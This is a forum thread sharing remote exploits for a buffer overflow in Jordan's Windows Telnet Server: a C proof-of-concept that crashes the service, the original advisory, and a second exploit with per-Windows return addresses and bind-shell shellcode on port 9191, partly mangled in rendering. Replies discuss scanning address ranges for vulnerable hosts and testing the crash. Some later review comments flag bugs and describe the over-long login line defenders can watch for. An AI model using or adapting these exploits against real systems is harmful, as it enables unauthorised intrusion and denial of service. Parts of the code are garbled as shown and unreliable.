
ehm
CODE

/*

by Luigi Auriemma

Use -DWIN to compile the source on Windows

UNIX & WIN VERSION
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef WIN
   #include <winsock.h>
   #include "winerr.h"

   #define close   closesocket
#else
   #include <unistd.h>
   #include <sys/socket.h>
   #include <sys/types.h>
   #include <arpa/inet.h>
   #include <netdb.h>
#endif





#define VER     "0.1"
#define PORT    23
#define BUFFSZ  2048
#define BOFSZ   518     /* 516 + 0d + 0a */
#define OFFSET  512
#define RETADD  0xdeadc0de







u_long resolv(char *host);
void std_err(void);






/*
 * Proof-of-concept driver.  Usage: <server> [port], default port 23.
 *
 * Sequence: resolve and connect, print the service's greeting, send ONE
 * 518-byte "username" line, print the reply, close.  The line is laid
 * out as
 *     512 x 'A'  |  4-byte RETADD (0xdeadc0de)  |  CR LF
 * (see BOFSZ, OFFSET and RETADD above).  0xdeadc0de is not a usable
 * code address, so this demonstrates the crash described in the
 * advisory further down the thread (an unchecked copy of the received
 * string into a smaller buffer, with byte 512 onward landing on the
 * saved return address); it is not a shell.
 *
 * Defender's note: the observable artefact is a telnet login line
 * hundreds of bytes long on port 23, far beyond any legitimate
 * username.  The advisory reports no vendor fix, so the control is to
 * not expose this service.
 *
 * Returns 0 after the exchange.  Every failure path calls std_err(),
 * which prints the error and exits with status 1.
 */
int main(int argc, char *argv[]) {
   u_char  *buff;
   struct  sockaddr_in     peer;
   int     sd,
           err;
   u_short port = PORT;


   setbuf(stdout, NULL);    /* unbuffered stdout: progress text appears before blocking calls */

   fputs("\n"
       "Jordan's Windows Telnet Server 1.2 remote buffer-overflow "VER"\n"
       "by Luigi Auriemma\n"
       "e-mail: aluigi@altervista.org\n"
       "web:    http://aluigi.altervista.org\n"
       "\n", stdout);

   if(argc < 2) {
       printf("\nUsage: %s <server> [port(%d)]\n"
           "\n"
           "The return address will be overwritten with the value 0x%08x\n"
           "\n", argv[0], PORT, RETADD);
       exit(1);
   }



#ifdef WIN
   WSADATA    wsadata;
   WSAStartup(MAKEWORD(1,0), &wsadata);   /* Winsock init; result not checked */
#endif


   /* atoi(): no error reporting, 0 on non-numeric input, truncated to u_short */
   if(argc > 2) port = atoi(argv[2]);

   peer.sin_addr.s_addr = resolv(argv[1]);   /* resolv() exits on failure */
   peer.sin_port        = htons(port);
   peer.sin_family      = AF_INET;


   /* one 2048-byte buffer for both receive and send; never freed (process exits) */
   buff = malloc(BUFFSZ);
   if(!buff) std_err();

   sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
   if(sd < 0) std_err();

   printf("\n"
       "Connecting to %s:%hu...",
       inet_ntoa(peer.sin_addr), port);
   err = connect(sd, (struct sockaddr *)&peer, sizeof(peer));
   if(err < 0) std_err();
   fputs("ok and now sending the big string\n\n", stdout);

   /* the service's greeting / login prompt; 0 bytes (peer closed) is not
    * treated as an error and a 0-byte fwrite() writes nothing */
   err = recv(sd, buff, BUFFSZ, 0);
   if(err < 0) std_err();
   fwrite(buff, err, 1, stdout);


       /* BOOM BOOM CICABOOM */
   memset(buff, 'A', BOFSZ - 2);               // bytes 0..515 = 'A'
   /* bytes 512..515 = RETADD.  This is an unaligned type-punning store;
    * on an LP64 host it writes sizeof(long) == 8 bytes (512..519), still
    * inside the 2048-byte buffer, and on a little-endian host the four
    * bytes that go on the wire are unchanged. */
   *(long *)(buff + OFFSET) = RETADD;          // write RETADD
   memcpy(buff + BOFSZ - 2, "\x0d\x0a", 2);    // bytes 516..517 = CR LF, the telnet line terminator

   /* exactly BOFSZ (518) bytes; a short send is not retried */
   err = send(sd, buff, BOFSZ, 0);
   if(err < 0) std_err();


   /* whatever the service answers; a connection reset here is reported
    * through std_err() because recv() returns -1 */
   err = recv(sd, buff, BUFFSZ, 0);
   if(err < 0) std_err();
   fwrite(buff, err, 1, stdout);
   fputc('\n', stdout);

   close(sd);

   return(0);
}








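/*
 * Resolve `host` (dotted quad or hostname) to an IPv4 address in
 * network byte order, the form sockaddr_in.sin_addr.s_addr expects.
 *
 * Returns the address.  On failure (unresolvable name, or a resolver
 * answer that is not a 4-byte IPv4 address) it prints a message and
 * exits with status 1, matching the PoC's fatal-error convention.
 * Caveat kept from the original: inet_addr() signals failure with
 * INADDR_NONE (255.255.255.255), so that literal falls through to the
 * resolver instead of being accepted.
 */
u_long resolv(char *host) {
   struct hostent *hp;
   struct in_addr  addr;
   u_long          host_ip;

   host_ip = inet_addr(host);          /* fast path: numeric address */
   if(host_ip != INADDR_NONE) return(host_ip);

   hp = gethostbyname(host);
   /* The original read the address through a u_long pointer.  An entry
    * of h_addr_list is h_length bytes (4 for AF_INET), so on LP64 hosts
    * that was an 8-byte read past the entry; copy exactly one in_addr
    * instead, and refuse anything that is not an IPv4 answer. */
   if(!hp || hp->h_addrtype != AF_INET || hp->h_length != (int)sizeof addr
      || !hp->h_addr_list[0]) {
       printf("\nError: Unable to resolve hostname (%s)\n", host);
       exit(1);
   }
   memcpy(&addr, hp->h_addr_list[0], sizeof addr);
   host_ip = addr.s_addr;

   return(host_ip);
}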






#ifndef WIN
   /* Fatal-error exit for the UNIX build: perror() prints "\nError: "
    * followed by strerror(errno) to stderr, then the process exits with
    * status 1.  Never returns.  The Windows build instead gets its
    * std_err() from winerr.h (included above), which also maps Winsock
    * error codes. */
   void std_err(void) {
       perror("\nError");
       exit(1);
   }
#endif




CODE

/*
  Header file used to manage errors on Windows.
  It supports both socket errors and errno.
  (This header replaces the previous sock_errX.h.)
*/

#include <string.h>
#include <errno.h>



/*
 * Fatal-error exit for the Windows build (winerr.h).
 * Looks up the current Winsock error from WSAGetLastError() in a
 * code -> message table; a code that is not in the table falls back to
 * the C runtime's strerror(errno).  The message is printed to stderr as
 * "\nError: <message>\n" and the process exits with status 1.
 * Never returns.
 */
void std_err(void) {
   static const struct {
       int         code;
       const char *text;
   } wsa_table[] = {
       { 10004, "Interrupted system call" },
       { 10009, "Bad file number" },
       { 10013, "Permission denied" },
       { 10014, "Bad address" },
       { 10022, "Invalid argument (not bind)" },
       { 10024, "Too many open files" },
       { 10035, "Operation would block" },
       { 10036, "Operation now in progress" },
       { 10037, "Operation already in progress" },
       { 10038, "Socket operation on non-socket" },
       { 10039, "Destination address required" },
       { 10040, "Message too long" },
       { 10041, "Protocol wrong type for socket" },
       { 10042, "Bad protocol option" },
       { 10043, "Protocol not supported" },
       { 10044, "Socket type not supported" },
       { 10045, "Operation not supported on socket" },
       { 10046, "Protocol family not supported" },
       { 10047, "Address family not supported by protocol family" },
       { 10048, "Address already in use" },
       { 10049, "Can't assign requested address" },
       { 10050, "Network is down" },
       { 10051, "Network is unreachable" },
       { 10052, "Net dropped connection or reset" },
       { 10053, "Software caused connection abort" },
       { 10054, "Connection reset by peer" },
       { 10055, "No buffer space available" },
       { 10056, "Socket is already connected" },
       { 10057, "Socket is not connected" },
       { 10058, "Can't send after socket shutdown" },
       { 10059, "Too many references, can't splice" },
       { 10060, "Connection timed out" },
       { 10061, "Connection refused" },
       { 10062, "Too many levels of symbolic links" },
       { 10063, "File name too long" },
       { 10064, "Host is down" },
       { 10065, "No Route to Host" },
       { 10066, "Directory not empty" },
       { 10067, "Too many processes" },
       { 10068, "Too many users" },
       { 10069, "Disc Quota Exceeded" },
       { 10070, "Stale NFS file handle" },
       { 10091, "Network SubSystem is unavailable" },
       { 10092, "WINSOCK DLL Version out of range" },
       { 10093, "Successful WSASTARTUP not yet performed" },
       { 10071, "Too many levels of remote in path" },
       { 11001, "Host not found" },
       { 11002, "Non-Authoritative Host not found" },
       { 11003, "Non-Recoverable errors: FORMERR, REFUSED, NOTIMP" },
       { 11004, "Valid name, no data record of requested type" },
   };
   const int   wsa_code = WSAGetLastError();
   const char *msg      = NULL;
   size_t      i;

   for(i = 0; i < sizeof(wsa_table) / sizeof(wsa_table[0]); i++) {
       if(wsa_table[i].code == wsa_code) {
           msg = wsa_table[i].text;
           break;
       }
   }
   /* not a Winsock code: report the C-runtime errno instead */
   if(!msg) msg = strerror(errno);

   fprintf(stderr, "\nError: %s\n", msg);
   exit(1);
}



DJVASTVASTY2K
Hello M8's

Thank You For This Sploit

Ive not seen many TelNet Sploits so this does make a change. I wonder how many of the servers I have are vulnerable to this exploit.

Thank You

Best Regards

Adam

Vast Gsm
DJVASTVASTY2K
Hello M8's

Just To Show Some People Of How It Looks When Exploit Is Launched.

C:\>cd C:\WINDOWS\IWam_User_Config\Security\31-12-03

C:\WINDOWS\IWam_User_Config\Security\31-12-03>jordwts

Jordan's Windows Telnet Server 1.2 remote buffer-overflow 0.1
by Luigi Auriemma
e-mail: aluigi@altervista.org
web: http://aluigi.altervista.org


Usage: jordwts <server> [port(23)]

The return address will be overwritten with the value 0xdeadc0de


C:\WINDOWS\IWam_User_Config\Security\31-12-03>

Best Regards

Adam

Vast Gsm
liquidSilver
DJVASTVASTY2K: Post whore. Man, what did you just explain that we not already know?!

...god.
DJVASTVASTY2K
Hello m8's

I would Like To Say A Big Thank You To "Luigi Auriemma" For Releasing This Exploit And Advisory.

Please Say A Big Thank You To "Ehm" For Posting This Exploit Along With The Source And It Being Compiled Too.

All I Have Done Is Filled In Some Additional Details Etc..

PS>
===
Some people may be wondering when this exploit was released to the public; well, here it is.

PPS>
===
Some People May Also Be Wondering About More Info On This Exploit, So Here It Is. Enjoy!

Best Regards

Adam

Vast Gsm

News:

29 Dec 2003 Advisories: Buffer-overflow in Jordan's telnet server.



#######################################################################

Luigi Auriemma

Application: Jordan's Windows Telnet server
http://www.jordan.com/WindowsTelnetServer
Versions: 1.0 (but the same version is also identified as 1.2)
Platform: Windows
Bug: buffer overflow
Risk: high
Exploitation: remote
Date: 29 Dec 2003
Author: Luigi Auriemma
e-mail: aluigi@altervista.org
web: http://aluigi.altervista.org


#######################################################################


1) Introduction
2) Bug
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


Windows Telnet Server (Wtsd) is a small commercial telnet server
written by Jordan Stojanovski.


#######################################################################

======
2) Bug
======


The bug is a remote buffer overflow in the client login procedure.
In practice, a username of 518 bytes completely overwrites the return
address of the vulnerable function.
The problem is the unchecked copy of the buffer holding the string
received from the socket into a new, smaller buffer:

:00406281 F3A5 rep movsd

(instruction's offset of the demo version)


#######################################################################

===========
3) The Code
===========


http://aluigi.altervista.org/poc/jordwts.zip


#######################################################################

======
4) Fix
======


No replies from the author.


#######################################################################
bl00dyviper
is there any possibility of identifying which telnet server is running? because i get so many results on port 23
DJVASTVASTY2K
QUOTE (bl00dyviper @ Dec 31 2003, 11:46 AM)
is there any possibility of identifying which telnet server is running? because i get so many results on port 23

Hello M8's

HEHE

This Is Vuln To Normal TelNet

The Client Must Be Running Jordans "TelNet" server

I have Just Uploaded The TelNet Server Programme That The Target Needs To be Running

http://www.governmentsecurity.org/forum/in...?showtopic=5650

Hope This Helps

Best Regards

Adam

Vast Gsm
DJVASTVASTY2K
Hello M8's

@Bl00dyViper

A ThankYou To "Ehm"

Dont Go A Miss.

Best Regards

Adam

Vast Gsm
DJVASTVASTY2K
QUOTE (LiquidSilver @ Dec 31 2003, 10:54 AM)
DJVASTVASTY2K: Post whore. Man, what did you just explain that we not already know?!

...god.

Hello M8's

No Offence

But Yes SOME PEOPLE DO NOT Already Know

It Proves It Below

LOL

Best Regards

Adam

Vast Gsm
bl00dyviper
yeah, but i can't test thousands of servers to see if "jordan telnet server" is running, because there is more than one telnet server out there. so is there any tool, like the ones for http, where i can identify the banner of the telnet server?
seppel18
Does it Spawn a Shell, or is it just DoS-Sploit?? blink.gif
TheAngel
i think we should use a CGI scanner for this
like xray
but whats the cgi command to scanning this?
Divx_dude
thx dude i tested it locally and it worked very well, only the TELNET server crashes;)
Divx_dude
CODE

Connecting to 192.168.0.13:23...ok and now sending the big string

Windows Telnet Server Version 1.0
Copyright(C) Jordan Stojanovski 1999
------------------------------------
User name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAÌ└¡Ì


C:\Documents and Settings\admin\Desktop\telnet exploit>



i think its a DOS exploit sad.gif
seppel18
yeah..no shellcode tongue.gif
cyrixx
eeeeeem, what about that? tongue.gif :
CODE
/*
*   Jordan's Windows Telnet server v.1.0 remote exploit
*   binds cmd.exe shell on port 9191
*
* Home page: http://www.jordan.com/WindowsTelnetServer
* Advisory: http://security.nnov.ru/search/document.asp?docid=5583
*
* Tested on winxp only, but must work on other win32 systems.
*
* -d4rkgr3y [d4rk@securitylab.ru], m00.void.ru
*
*/

#include <string.h>
#include <unistd.h>
#include <netdb.h>

/*
 * Option table indexed by the <os type> argument.  main() copies four
 * bytes of the chosen entry's `ret` (a `long`, so on an LP64 host the
 * low four bytes on little-endian) to offset 512 of the request, i.e.
 * the position the advisory in this thread identifies as the saved
 * return address.  Only the first entry's own comment explains its
 * value (a `jmp esp` inside ntdll.dll); the others carry no
 * explanation and are unverified here.  Hard-coded module addresses
 * like these only hold for the exact OS build listed, which is the
 * dependency ASLR later removed.
 * NOTE(review): there is no terminating NULL entry, yet usage() below
 * loops until it finds one.
 */
struct
{
char *platform;
long ret;
}

targets[]=
{
{"Windows XP sp0", 0x77F5801C}, // ntdll.dll : jmp esp
{"Windows XP sp1", 0x77fb59cc},
{"Windows 2000 SP1" , 0x77e3cb4c } ,
{"Windows 2000 SP2" , 0x77e2492b } ,
{"Windows 2000 SP3" , 0x77e2afc5 } ,
{"Windows 2000 SP4" , 0x77e14c29 } ,
{"Windows NT sp6", 0x77f0eac3},
{"Windows 98 SE", 0x7fdabfa9},
{"Denial-of-Service attack", 0xdefaced},
};

/*
 * Filler placed by main() at offset 516, directly after the 4-byte
 * target address.  NOTE(review): as rendered on this page every escape
 * has lost its backslash, so each "x90" is three ASCII characters, not
 * one byte; the array is not the author's data and the listing does
 * not build as shown.  main() copies sizeof(payload), which includes
 * the terminating NUL; the following memcpy at offset 548 overlaps the
 * tail of that copy.
 */
char payload[] =
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90";

/*
 * Opaque machine-code payload.  The header comment describes it as a
 * cmd.exe bind shell on port 9191; that claim is not verifiable from
 * this page and several replies in the thread report only crashes.
 * NOTE(review): as rendered here every "\x" escape has lost its
 * backslash, so this array holds ASCII text ("xEBx03..."), not the
 * author's bytes, and the listing cannot build or run as shown.
 * main() copies it to offset 548 of the 1032-byte request and uses
 * strlen() on it to place the terminating CR LF.
 */
char w32pbshellcode[] =
"xEBx03x5DxEBx05xE8xF8xFFxFFxFFx8BxC5x83xC0x11x33"
"xC9x66xB9xC9x01x80x30x88x40xE2xFAxDDx03x64x03x7C"
"x09x64x08x88x88x88x60xC4x89x88x88x01xCEx74x77xFE"
"x74xE0x06xC6x86x64x60xD9x89x88x88x01xCEx4ExE0xBB"
"xBAx88x88xE0xFFxFBxBAxD7xDCx77xDEx4Ex01xCEx70x77"
"xFEx74xE0x25x51x8Dx46x60xB8x89x88x88x01xCEx5Ax77"
"xFEx74xE0xFAx76x3Bx9Ex60xA8x89x88x88x01xCEx46x77"
"xFEx74xE0x67x46x68xE8x60x98x89x88x88x01xCEx42x77"
"xFEx70xE0x43x65x74xB3x60x88x89x88x88x01xCEx7Cx77"
"xFEx70xE0x51x81x7Dx25x60x78x88x88x88x01xCEx78x77"
"xFEx70xE0x2Cx92xF8x4Fx60x68x88x88x88x01xCEx64x77"
"xFEx70xE0x2Cx25xA6x61x60x58x88x88x88x01xCEx60x77"
"xFEx70xE0x6DxC1x0ExC1x60x48x88x88x88x01xCEx6Ax77"
"xFEx70xE0x6FxF1x4ExF1x60x38x88x88x88x01xCEx5ExBB"
"x77x09x64x7Cx89x88x88xDCxE0x89x89x88x88x77xDEx7C"
"xD8xD8xD8xD8xC8xD8xC8xD8x77xDEx78x03x50xDFxDFxE0"
"x8Ax88xABx6Fx03x44xE2x9ExD9xDBx77xDEx64xDFxDBx77"
"xDEx60xBBx77xDFxD9xDBx77xDEx6Ax03x58x01xCEx36xE0"
"xEBxE5xECx88x01xEEx4Ax0Bx4Cx24x05xB4xACxBBx48xBB"
"x41x08x49x9Dx23x6Ax75x4ExCCxACx98xCCx76xCCxACxB5"
"x01xDCxACxC0x01xDCxACxC4x01xDCxACxD8x05xCCxACx98"
"xDCxD8xD9xD9xD9xC9xD9xC1xD9xD9x77xFEx4AxD9x77xDE"
"x46x03x44xE2x77x77xB9x77xDEx5Ax03x40x77xFEx36x77"
"xDEx5Ex63x16x77xDEx9CxDExECx29xB8x88x88x88x03xC8"
"x84x03xF8x94x25x03xC8x80xD6x4Ax8Cx88xDBxDDxDExDF"
"x03xE4xACx90x03xCDxB4x03xDCx8DxF0x8Bx5Dx03xC2x90"
"x03xD2xA8x8Bx55x6BxBAxC1x03xBCx03x8Bx7DxBBx77x74"
"xBBx48x24xB2x4CxFCx8Fx49x47x85x8Bx70x63x7AxB3xF4"
"xACx9CxFDx69x03xD2xACx8Bx55xEEx03x84xC3x03xD2x94"
"x8Bx55x03x8Cx03x8Bx4Dx63x8AxBBx48x03x5DxD7xD6xD5"
"xD3x4Ax8Cx88";

void usage();

struct hostent *hp;

/*
 * Entry point: <host> <os type> [port].  Builds a 1032-byte request,
 * connects to the telnet port, waits, sends it, then tries to connect
 * to port 9191 where the header comment says a shell will be listening.
 * Exits 0 at the end, 1 when resolving or connecting fails.
 *
 * NOTE(review): as rendered on this page the listing has lost its
 * backslash escapes ('x41' is a multi-character constant, "...n" has
 * no newline, 'x0d'/'x0a' are not CR/LF), so this is not the text the
 * author compiled and it will not build as shown.  connect_to_host()
 * and get_shell() are also called before any declaration (they are
 * defined further down), which C99 rejects.
 *
 * Request layout, from the memcpy/memset calls below: filler from 0,
 * 4-byte table entry at 512 (the same offset the first PoC in this
 * thread uses), payload at 516, shellcode at 548, then CR LF.  For a
 * detector the relevant trait is the same as for the first PoC: a
 * login line of about 1 KiB on port 23.
 */
int main(int argc, char *argv[])
{
unsigned short port=23;
unsigned int sock,addr,hand;   /* addr is never used; sock/hand are unsigned, so the ==-1 tests below rely on integer conversion */
char buf[1032], shit[666];

printf("n     Jordan's Windows Telnet server v.1.0 remote exploitn");
printf("ttby m00 Security // m00.void.runn");

if(argc<3 || argc>4) usage(argv[0]);
/* only an upper bound is checked: a negative value indexes targets[]
 * out of range, and table entries beyond index 5 are unreachable */
if((atoi(argv[2]))>5) usage(argv[0]);
if(argv[3]) port = atoi(argv[3]);   /* argv[argc] is NULL, so safe when argc==3; value unvalidated */

memset(buf,'x41',1032);
memcpy(&buf[512], (unsigned char *) &targets[atoi(argv[2])].ret, 4);
memcpy(&buf[516], payload, sizeof(payload));
memcpy(&buf[548], w32pbshellcode, sizeof(w32pbshellcode));
memset(buf+strlen(w32pbshellcode)+548,'x0d',1);
memset(buf+strlen(w32pbshellcode)+548+1,'x0a',1);

printf("~ Resolving hostname => ");
if((hp=gethostbyname(argv[1]))==NULL) {
printf("failedn");
exit(1);
}
printf("donen");

printf("~ Conneting => ");
if((sock=connect_to_host(port))==-1) {
printf("failedn");
exit(1);
}
printf("donen");

printf("~ Sending exploit buffer => ");
sleep(2);
recv(sock,shit,666,0);   /* discard the greeting; return value ignored */
send(sock,buf,1032,0);   /* return value ignored: a short send goes unnoticed */
printf("donen");
printf("~ Connecting to bindshell => ");
usleep(1000);   /* 1 ms pause before the second connection attempt */
if((hand=connect_to_host(9191))==-1)
printf("failednn");
else {
printf("donen~ Shell spawned on port 9191 ^ have a nice daynn");
get_shell(hand);   /* closes hand before returning */
}

close(sock);
exit(0);
}

/*
 * Print the option table and exit(0).  Declared above as `void usage();`
 * (empty parameter list) and called with one argument, which C permits
 * but does not type-check.
 * NOTE(review): `targets.platform` is not valid C (targets is an array;
 * the index is missing, presumably lost in rendering), and even as
 * targets[i].platform the loop has no stop condition because the table
 * above has no terminating NULL entry, so it would read past the end
 * of the array.
 */
void usage(char *progname)
{
int i;
printf("Usage: %s <host> <os type> [port]nnWhere 'os type' is:n",progname);
for(i=0;targets.platform;i++) {
printf("   %i %sn", i, targets.platform);
}
printf("n");
exit(0);
}

/*
 * Open a TCP connection on `port` to the host main() resolved into the
 * global `hp`.  Returns the connected socket, or -1 (after closing the
 * socket) when socket() or connect() fails.  Must only be called after
 * gethostbyname() succeeded: hp is dereferenced without a check.
 * NOTE(review): h_addr_list[0] points at h_length bytes (4 for IPv4);
 * reading it through `unsigned long *` is an 8-byte read on LP64 hosts.
 * memcpy into a struct in_addr would be the clean form.
 */
int connect_to_host(int port)
{
int sockt;
struct sockaddr_in saddr;

if((sockt=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
return -1;
memset((void *)&saddr, 0, sizeof(struct sockaddr_in));
saddr.sin_family=AF_INET;
saddr.sin_addr.s_addr=*((unsigned long *)hp->h_addr_list[0]);
saddr.sin_port=htons(port);
if(connect(sockt, (struct sockaddr *)&saddr, sizeof(saddr))<0) {
close(sockt);
return -1;
} else
return sockt;
}

/*
 * Interactive relay between this process's stdin/stdout and the socket
 * `bsh`: select() on both, copy socket data to stdout and stdin data to
 * the socket, until select() returns 0 or the last transfer was 0 bytes.
 * Closes bsh and returns 1.
 * NOTE(review): `''` is an empty character constant (not valid C;
 * presumably a '\0' whose backslash was lost in rendering).  recv() and
 * read() return -1 on error, which is then used unchecked as an index
 * (buf[-1]).  A select() error (-1) also passes `if(retVal)` and the
 * fd_set is then inspected in an unspecified state.  `r` is read in the
 * loop condition before any assignment on such a path.  buf is about
 * 197 KiB (0x31337 bytes) of stack.  send() uses strlen(buf), so stdin
 * data is forwarded only up to its first NUL byte.
 */
int get_shell(int bsh)
{
fd_set rfds;
int retVal,r;
char buf[0x31337];
do {
FD_ZERO(&rfds);
FD_SET(0, &rfds);
FD_SET(bsh, &rfds);
retVal=select(bsh+1, &rfds, NULL, NULL, NULL);
if(retVal) {
if(FD_ISSET(bsh, &rfds)) {

buf[(r=recv(bsh, buf, 8095,0))]='';
printf("%s", buf);
}
if(FD_ISSET(0, &rfds)) {
buf[(r=read(0, buf, 8095))]='';
send(bsh, buf, strlen(buf), 0);
}
}
} while(retVal && r);

close(bsh);
return 1;
}
BlueSkydrei
Has anybody had any luck compiling this?
rush
Hehe i scanned like 50 ranges from 1.1.0.0 - 1.1.255.255 (example)
And none of them was running Jordans server, ( I did it with superscanner4 portbanner grabbing)
Then i installed it localy and it seems a dos exploit none cmd shell ph34r.gif
KoNh
Aslo have this exploit compiled (there are 2 versions) both
are crashing the telnet daemon (tried it on my network)
no shell binded to any port...
SyN/AcK
If anyone is still interested, I found one that works for me. Search on google for ws_bo.c. It binds a shell to port 9191.
Mephisto
can you post it here SyN/AcK so we can test your program plz??


and thnx allot 4 the sploit
SyN/AcK
Yep, I'll do it in an hour or two... I have to find it, my computer is all unorganized now.
-=[MePhIsTo]=-
But how to scan for this Server. When i do a Banner scan with DSNS on Port 23 it only give me decrypt letters like
CODE
207.21.*.*   23     ........#..'..$